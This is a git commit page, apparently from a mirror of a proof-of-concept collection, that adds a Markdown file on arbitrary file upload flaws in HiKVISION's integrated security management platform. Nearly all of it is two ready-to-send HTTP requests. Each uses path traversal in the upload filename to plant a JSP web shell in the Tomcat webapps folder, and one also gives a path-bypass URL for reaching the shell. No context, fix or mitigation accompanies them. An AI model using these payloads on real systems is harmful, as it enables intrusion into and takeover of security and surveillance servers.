mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create HiKVISION 综合安防管理平台 任意文件上传漏洞.md
This commit is contained in:
parent
17b8c3a57f
commit
0ac1472d77
32
HiKVISION 综合安防管理平台 任意文件上传漏洞.md
Normal file
32
HiKVISION 综合安防管理平台 任意文件上传漏洞.md
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
## HiKVISION 综合安防管理平台 report 任意文件上传漏洞
|
||||||
|
|
||||||
|
```
|
||||||
|
POST /svm/api/external/report HTTP/1.1
|
||||||
|
Host: 10.10.10.10
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
|
||||||
|
Content-Type: application/zip
|
||||||
|
|
||||||
|
<%jsp的马%>
|
||||||
|
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a--
|
||||||
|
|
||||||
|
马儿路径:/portal/ui/login/..;/..;/new.jsp
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## HiKVISION 综合安防管理平台 files 任意文件上传漏洞
|
||||||
|
```
|
||||||
|
POST /center/api/files;.html HTTP/1.1
|
||||||
|
Host: 10.10.10.10
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
|
||||||
|
Content-Type: application/zip
|
||||||
|
|
||||||
|
<%jsp的马%>
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a--
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user